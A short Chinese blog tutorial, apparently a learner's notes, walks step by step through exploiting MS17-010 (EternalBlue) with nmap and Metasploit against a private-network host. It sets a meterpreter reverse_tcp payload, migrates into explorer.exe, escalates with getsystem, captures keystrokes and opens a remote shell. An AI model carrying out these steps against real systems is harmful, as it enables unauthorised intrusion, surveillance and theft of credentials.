利用ms17_010系统漏洞实现系统入侵

最近在学习kali的使用，总结一下ms17_010漏洞的利用，操作基础，步骤详细，简单易懂

操作步骤：

1.输入 “nmap -sS 192.168.1.105 -p 445”,表示隐秘的对445端口进行扫描

2.输入“msfconsole”，进入metasploit工具

3.输入“search ms17_010”,搜索ms17_010漏洞模块

4.对照搜索出来的路径，对ms17_010模块进行加载

并设置目标主机为192.168.1.105，然后“run”

5.说明存在漏洞，可以使用永恒之蓝进行攻击

6.根据搜索出来的目录，加载永恒之蓝攻击模块

7.然后运行，能成功进入主机

8.设置攻击荷载：set payload windows/x64/meterpreter/reverse_tcp

9. 连接至主机，显示现在运行的进程,找到explorer.exe进程

10.将寄存进程修改为explorer，然后再getpid查看是否修改成功

11.利用getuid查看现在的权限，然后利用getsystem进行提权

12.监控目标主机的键盘输入，然后显示出来

13.输入shell可以进入目标主机的命令行

操作到这就基本结束了，可以根据自己的需要进行研究深入

meterpreter>? 显示帮助

如想了解源代码，请移步另一博客https://blog.****.net/qq_32261191/article/details/80451998

水平不足，如有错误，欢迎大家指正